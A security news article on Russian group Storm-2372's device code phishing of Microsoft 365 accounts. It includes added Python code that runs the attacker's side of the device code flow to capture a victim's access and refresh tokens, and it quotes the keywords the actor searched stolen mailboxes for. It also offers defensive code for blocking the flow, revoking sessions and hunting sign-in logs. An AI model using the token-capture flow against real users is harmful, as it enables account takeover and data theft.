
Russian Hackers Use Microsoft Device Code Phishing In Targeted Attacks

Russian hackers tracked by Microsoft as Storm-2372 have been attacking government and private-sector organisations since August 2024. The group specialises in compromising Microsoft 365 accounts with a technique known as device code phishing, which it has found to be more effective than conventional spear-phishing.

The attackers pose as representatives of government agencies, such as the US Department of State, and of prominent research institutions. They gain persistent access to victims’ accounts by tricking targets into entering an attacker-generated Microsoft device code on a genuine Microsoft sign-in page.

Targets span government, IT, defence, telecommunications, healthcare, education, energy and non-governmental organisations across Africa, Europe, the Middle East and North America.

The Microsoft Threat Intelligence Center (MSTIC) tracks this operation under the label “Storm-2372.” Based on the organisations targeted and the tradecraft used, researchers assess that the campaign is likely a nation-state effort supporting Russian objectives.

Russian Hackers Manipulate Device Code Authentication to Breach Corporate Security

Rather than exploiting a software vulnerability, the attackers abuse a legitimate authentication feature. Device code authentication (the OAuth 2.0 device authorization grant) lets users sign in to M365 services from devices that lack a full browser or keyboard, such as Internet-of-Things (IoT) devices, smart TVs and command-line tools.

Instead of a traditional login, such a device displays a short code that the user enters on another device, typically a smartphone or computer, at Microsoft’s sign-in page; once the code is entered, the device that requested it receives the user’s tokens. According to Volexity, CozyLarch, a group associated with the well-known Midnight Blizzard cluster, is at least one of the threat actors behind these attacks.

The lures typically took the form of an invitation to a virtual meeting, a request to access applications or data as an external M365 user, or an invitation to join a secure chat room.

Microsoft researchers found that Storm-2372 has been exploiting the device code authentication flow since late August 2024. The operators first build rapport by posing as a known and relevant contact on chat apps such as Microsoft Teams, WhatsApp and Signal, then trick the target into entering an attacker-generated code on a legitimate Microsoft sign-in page.

Storm-2372 creates fake meeting requests sent to targets (Microsoft)

Through these lures the attackers obtain authentication tokens for the targeted accounts. Once inside, they harvest sensitive information and retain access for as long as the stolen tokens remain valid.

According to Microsoft Threat Intelligence’s report:

During the attack, the threat actor generates a legitimate device code request and tricks the target into entering it into a legitimate sign-in page. This grants the actor access and enables them to capture the authentication—access and refresh—tokens that are generated, then use those tokens to access the target’s accounts and data.
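The exchange Microsoft describes is the standard OAuth 2.0 device authorization grant; the attacker simply plays the role of the "device". The following is an added example written for this article (not Microsoft’s or the attacker’s code) that implements both steps of the flow against the Microsoft identity platform and replays them offline against a constructed stand-in. Endpoint paths, grant type and field names follow Microsoft’s public documentation; the client id is a placeholder and the lure text is constructed.

```python
"""OAuth 2.0 device authorization grant (RFC 8628) as served by the Microsoft
identity platform.  Whoever starts the flow receives the tokens, no matter who
types the user code into microsoft.com/devicelogin, which is the whole attack.

Added illustration for this article, not Microsoft's or Storm-2372's code.
Assumptions: endpoints and field names per Microsoft's public docs; CLIENT_ID
is a placeholder; `post` is injected so the exchange can run offline against
the constructed FakeEntra class below.
"""
import json
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Any, Callable, Dict, List, Tuple

TENANT = "common"
DEVICECODE_URL = f"https://login.microsoftonline.com/{TENANT}/oauth2/v2.0/devicecode"
TOKEN_URL = f"https://login.microsoftonline.com/{TENANT}/oauth2/v2.0/token"
CLIENT_ID = "00000000-0000-0000-0000-000000000000"  # placeholder, not a real app id
SCOPE = "openid profile offline_access https://graph.microsoft.com/.default"
DEVICE_CODE_GRANT = "urn:ietf:params:oauth:grant-type:device_code"

PostFn = Callable[[str, Dict[str, str]], Dict[str, Any]]


def http_post(url: str, form: Dict[str, str]) -> Dict[str, Any]:
    """Real transport: form-encoded POST, JSON reply (Entra returns JSON on 4xx too)."""
    req = urllib.request.Request(url, data=urllib.parse.urlencode(form).encode(), method="POST")
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return json.loads(resp.read())
    except urllib.error.HTTPError as e:
        return json.loads(e.read())


def start_device_flow(post: PostFn, client_id: str = CLIENT_ID, scope: str = SCOPE) -> Dict[str, Any]:
    """Step 1 (initiator only): obtain a device_code/user_code pair.  The user_code
    and verification_uri are what the phisher forwards as a 'meeting invitation'."""
    resp = post(DEVICECODE_URL, {"client_id": client_id, "scope": scope})
    missing = [k for k in ("device_code", "user_code", "verification_uri", "expires_in", "interval") if k not in resp]
    if missing:
        raise ValueError(f"devicecode response missing {missing}: {resp}")
    return resp


def poll_for_tokens(post: PostFn, device_code: str, expires_in: int, interval: int,
                    client_id: str = CLIENT_ID,
                    sleep: Callable[[float], None] = time.sleep,
                    now: Callable[[], float] = time.monotonic) -> Dict[str, Any]:
    """Step 2 (initiator only): poll the token endpoint until the victim completes
    sign-in.  With offline_access in scope the reply carries a refresh token."""
    deadline = now() + expires_in  # user_code lifetime; Entra issues 900 s
    wait = interval
    while True:
        resp = post(TOKEN_URL, {"grant_type": DEVICE_CODE_GRANT,
                                "client_id": client_id, "device_code": device_code})
        if "access_token" in resp:
            return resp
        err = resp.get("error")
        if err == "slow_down":
            wait += 5  # RFC 8628 s3.5: increase the polling interval by 5 s
        elif err in ("expired_token", "authorization_declined", "bad_verification_code"):
            raise RuntimeError(f"flow ended without tokens: {err}")
        elif err != "authorization_pending":
            raise RuntimeError(f"unexpected token response: {resp}")
        if now() >= deadline:
            raise TimeoutError("user code expired before anyone entered it")
        sleep(wait)


class FakeEntra:
    """Constructed stand-in for login.microsoftonline.com: answers
    authorization_pending for N polls, then behaves as if the victim entered the code."""

    def __init__(self, polls_until_consent: int) -> None:
        self.remaining = polls_until_consent
        self.calls: List[Tuple[str, Dict[str, str]]] = []

    def __call__(self, url: str, form: Dict[str, str]) -> Dict[str, Any]:
        self.calls.append((url, dict(form)))
        if url == DEVICECODE_URL:
            return {"device_code": "DEVCODE-constructed", "user_code": "ABCDEFGHI",
                    "verification_uri": "https://microsoft.com/devicelogin",
                    "expires_in": 900, "interval": 5,
                    "message": "To sign in, use a web browser to open the page "
                               "https://microsoft.com/devicelogin and enter the code ABCDEFGHI."}
        if self.remaining > 0:
            self.remaining -= 1
            return {"error": "authorization_pending"}
        return {"token_type": "Bearer", "expires_in": 3599,
                "access_token": "eyJ0eXAi-constructed", "refresh_token": "0.AX-constructed"}


def run_offline_exchange(polls_until_consent: int = 2):
    """Drive both steps against FakeEntra; returns (devicecode reply, tokens, calls made)."""
    entra = FakeEntra(polls_until_consent)
    dc = start_device_flow(entra)
    tokens = poll_for_tokens(entra, dc["device_code"], dc["expires_in"], dc["interval"],
                             sleep=lambda _s: None)
    return dc, tokens, entra.calls


if __name__ == "__main__":
    dc, tokens, calls = run_offline_exchange()
    print("lure text forwarded to victim:", dc["message"])
    print("initiator received refresh token:", tokens["refresh_token"])
    print("token endpoint polls:", len(calls) - 1)
```

Two points the code makes concrete: nothing in the victim’s step binds the code to the device that requested it, so the tokens go to the initiator; and the `expires_in` of 900 seconds is the 15-minute window discussed later, after which the poll returns `expired_token` and the lure has to be re-sent. Swap `FakeEntra` for `http_post` to run against the real endpoint with your own tenant and app registration.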

Stolen authentication tokens also provide password-free access to other services, such as cloud storage and email. Microsoft observed the actor using the hijacked account’s legitimate session to move laterally, sending further phishing messages from it to other users inside the organisation. The actor also used the Microsoft Graph API to search through messages in the breached mailbox.

According to Redmond, emails that matched the actor’s keyword filters were then exfiltrated to the threat actor:

“The threat actor was using keyword searching to view messages containing words such as username, password, admin, teamviewer, anydesk, credentials, secret, ministry, and gov.”

Attack Flow of Device Code Exploitation (Microsoft)

Why Device Code Phishing is Effective: Leveraging Legitimate Microsoft Domains

Microsoft disclosed on February 14, 2025, that Storm-2372 had shifted to using the specific client ID of the Microsoft Authentication Broker when signing in with a device code. With that client ID the attacker receives a refresh token that can be exchanged for a token for the device registration service.

Using that token, the attacker can register a device under their control in Entra ID. With the refresh token and the new device identity the actor can then obtain a Primary Refresh Token (PRT) and access the organisation’s resources; the registered device was ultimately used to keep harvesting email.

Volexity observed lure emails sent from accounts impersonating the US Department of State, the Ukrainian Ministry of Defence, the EU Parliament and prominent research organisations.

APT29 is believed to be one of the clusters behind this activity. The group is also tracked as BlueBravo, Cloaked Ursa, CozyLarch, Cozy Bear, Midnight Blizzard (formerly Nobelium) and The Dukes.

In one case investigated by Volexity, UTA0304 used Signal to get in touch with a victim. By pretending to be a representative of the Ukrainian Ministry of Defence, the attacker persuaded the victim to switch the discussion to the secure messaging service Element.

The attacker then sent a spear-phishing email containing a link to join the chat room. The link led to a legitimate Microsoft page that prompted the victim to enter a device code to gain access.

Volexity’s Charlie Gardner, Steven Adair, and Tom Lancaster said in their analysis:

The message was a ploy to fool the user into thinking they were being invited into a secure chat, when in reality they were giving the attacker access to their account.

Device codes expire 15 minutes after they are generated. This short lifespan forces the attacker to generate the code only once the victim is primed and waiting for an “invitation” in a live conversation, so that it is entered before it expires.

CozyLarch and UTA0307 have used the same strategy, urging victims to join a Microsoft Teams meeting; once the victim enters the device code, the attacker gains access to their Microsoft 365 account and begins stealing sensitive information.

Microsoft recommends blocking the device code flow wherever possible, for example with a Conditional Access policy that targets the device code authentication flow, to prevent device code phishing attacks by Storm-2372. Microsoft also advises restricting access to Microsoft Entra ID to trusted networks and compliant devices using Conditional Access policies.

If you suspect device code phishing, call the Microsoft Graph ‘revokeSignInSessions’ action to revoke the affected user’s refresh tokens, and enforce a Conditional Access policy requiring re-authentication. Access tokens the attacker has already obtained remain usable until they expire, so revocation alone does not end an active session immediately.
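Both of the recommendations above map to single Microsoft Graph calls. The example below is added for this article (it is not Microsoft’s tooling): it builds a Conditional Access policy that blocks the device code flow and calls `revokeSignInSessions` for a suspected victim. It assumes a Graph bearer token with the `Policy.ReadWrite.ConditionalAccess` and `User.RevokeSessions.All` permissions, starts the policy in report-only mode so its impact can be reviewed, and treats `exclude_groups` as the id of a break-glass group; `post` is injectable so the request bodies can be inspected offline.

```python
"""Block the device code flow with Conditional Access and revoke a user's
sessions, via Microsoft Graph.  Added example for this article, not
Microsoft's code.  Assumptions: caller holds a bearer token with
Policy.ReadWrite.ConditionalAccess and User.RevokeSessions.All; the policy
starts report-only; `exclude_groups` holds break-glass group ids.
"""
import json
import urllib.request
from typing import Any, Callable, Dict, Iterable, Optional

GRAPH = "https://graph.microsoft.com/v1.0"
PostFn = Callable[[str, Optional[Dict[str, Any]]], Dict[str, Any]]


def block_device_code_policy(exclude_groups: Iterable[str] = (),
                             state: str = "enabledForReportingButNotEnforced",
                             display_name: str = "Block device code flow") -> Dict[str, Any]:
    """Body for POST /identity/conditionalAccess/policies.  The
    authenticationFlows condition matches only sign-ins that use the device
    code transfer method, so ordinary browser and app sign-ins are untouched."""
    return {
        "displayName": display_name,
        "state": state,  # switch to "enabled" once the report-only sign-in log looks clean
        "conditions": {
            "users": {"includeUsers": ["All"], "excludeGroups": list(exclude_groups)},
            "applications": {"includeApplications": ["All"]},
            "clientAppTypes": ["all"],
            "authenticationFlows": {"transferMethods": "deviceCodeFlow"},
        },
        "grantControls": {"operator": "OR", "builtInControls": ["block"]},
    }


def graph_post(token: str) -> PostFn:
    """Real transport bound to a bearer token; returns the parsed JSON body or {}."""
    def post(path: str, body: Optional[Dict[str, Any]]) -> Dict[str, Any]:
        data = json.dumps(body).encode() if body is not None else None
        req = urllib.request.Request(GRAPH + path, data=data, method="POST",
                                     headers={"Authorization": f"Bearer {token}",
                                              "Content-Type": "application/json"})
        with urllib.request.urlopen(req, timeout=30) as resp:
            raw = resp.read()
            return json.loads(raw) if raw else {}
    return post


def create_block_policy(post: PostFn, **policy_kwargs: Any) -> Dict[str, Any]:
    return post("/identity/conditionalAccess/policies", block_device_code_policy(**policy_kwargs))


def revoke_user_sessions(post: PostFn, user: str) -> Dict[str, Any]:
    """Invalidates the user's refresh tokens and session cookies.  Access tokens
    the attacker already holds keep working until they expire (roughly an hour),
    which is why this is paired with a re-authentication Conditional Access policy.
    `user` may be the object id or the userPrincipalName."""
    return post(f"/users/{user}/revokeSignInSessions", None)


if __name__ == "__main__":
    import os
    post = graph_post(os.environ["GRAPH_TOKEN"])  # token acquisition is out of scope here
    print(create_block_policy(post, exclude_groups=["<break-glass-group-id>"]))  # placeholder id
    print(revoke_user_sessions(post, "victim@example.com"))
```

If the attacker has already registered a device as described in the previous section, revoking sessions is not enough on its own: review devices registered to the user in the incident window and remove any that are not recognised before the policy is flipped from report-only to enabled.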

Monitor the sign-in logs in Microsoft Entra ID for device code authentications (sign-ins whose authentication protocol is device code). Watch for a high volume of device code sign-in attempts within a short period, device code sign-ins from IP addresses the user has never signed in from, and unusual authentication prompts sent to multiple users.
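The first two signals can be hunted mechanically. The following detection logic is an added example for this article (not a Microsoft query): it runs over sign-in records shaped like the Graph `auditLogs/signIns` objects, using only the `createdDateTime`, `userPrincipalName`, `ipAddress`, `authenticationProtocol` and `status.errorCode` fields, and flags device-code sign-ins from IPs the user has never used plus bursts of device-code attempts across the tenant. The sample records, the 10-minute window and the threshold of three are constructed assumptions for the demo, not values from the article.

```python
"""Hunt over Entra ID sign-in records for device code phishing indicators.
Added example for this article, not Microsoft's query.  Record shape follows
Graph auditLogs/signIns; SAMPLE_SIGNINS, the window and the threshold are
constructed for the demo (documentation IP ranges, fictional users).
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Any, Deque, Dict, Iterable, List, Set

SignIn = Dict[str, Any]


def _ts(rec: SignIn) -> datetime:
    return datetime.strptime(rec["createdDateTime"], "%Y-%m-%dT%H:%M:%SZ")


def _ok(rec: SignIn) -> bool:
    return rec.get("status", {}).get("errorCode", 0) == 0


def baseline_ips(records: Iterable[SignIn]) -> Dict[str, Set[str]]:
    """Per-user IPs seen on successful sign-ins that did NOT use the device code
    flow.  Anything outside this set is treated as unfamiliar for that user."""
    known: Dict[str, Set[str]] = defaultdict(set)
    for r in records:
        if _ok(r) and r.get("authenticationProtocol") != "deviceCode":
            known[r["userPrincipalName"]].add(r["ipAddress"])
    return known


def hunt_device_code(records: Iterable[SignIn], known_ips: Dict[str, Set[str]],
                     burst_window: timedelta = timedelta(minutes=10),
                     burst_threshold: int = 3) -> List[Dict[str, Any]]:
    """Flag (a) successful device-code sign-ins from an IP the user has never
    signed in from and (b) bursts of device-code attempts, successful or not,
    tenant-wide inside one sliding window (a sign that several users received
    the same 'invitation')."""
    findings: List[Dict[str, Any]] = []
    recent: Deque[datetime] = deque()
    for r in sorted(records, key=_ts):
        if r.get("authenticationProtocol") != "deviceCode":
            continue
        when, user, ip = _ts(r), r["userPrincipalName"], r["ipAddress"]
        if _ok(r) and ip not in known_ips.get(user, set()):
            findings.append({"type": "device_code_from_unfamiliar_ip",
                             "time": when, "user": user, "ip": ip})
        recent.append(when)
        while recent and when - recent[0] > burst_window:
            recent.popleft()
        if len(recent) == burst_threshold:
            findings.append({"type": "device_code_burst", "time": when,
                             "count": len(recent), "since": recent[0]})
    return findings


def _rec(ts: str, user: str, ip: str, proto: str, code: int = 0) -> SignIn:
    return {"createdDateTime": ts, "userPrincipalName": f"{user}@contoso.example",
            "ipAddress": ip, "authenticationProtocol": proto, "status": {"errorCode": code}}


# Constructed sample: a normal morning, then three device-code sign-ins in
# four minutes, two of them from an address nobody in the tenant has used.
SAMPLE_SIGNINS: List[SignIn] = [
    _rec("2025-02-10T09:00:00Z", "alice", "203.0.113.10", "oAuth2"),
    _rec("2025-02-10T09:05:00Z", "bob",   "203.0.113.11", "oAuth2"),
    _rec("2025-02-10T09:07:00Z", "carol", "203.0.113.12", "oAuth2"),
    _rec("2025-02-10T10:00:00Z", "alice", "198.51.100.7", "deviceCode"),
    _rec("2025-02-10T10:02:00Z", "bob",   "198.51.100.7", "deviceCode"),
    _rec("2025-02-10T10:03:00Z", "carol", "203.0.113.12", "deviceCode"),
]


def run_demo() -> List[Dict[str, Any]]:
    return hunt_device_code(SAMPLE_SIGNINS, baseline_ips(SAMPLE_SIGNINS))


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

The same first filter in Log Analytics is `SigninLogs | where AuthenticationProtocol == "deviceCode"`; the baseline of familiar IPs should be built from a longer lookback than the hunt window so that a user’s normal addresses are not mistaken for new ones.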

Security Awareness Training remains one of the most cost-effective methods of boosting cyber-security within your business. Have a look at our 14 day free trial to find out how many of your staff are susceptible to a phishing attack and learn how you can reduce this number today.
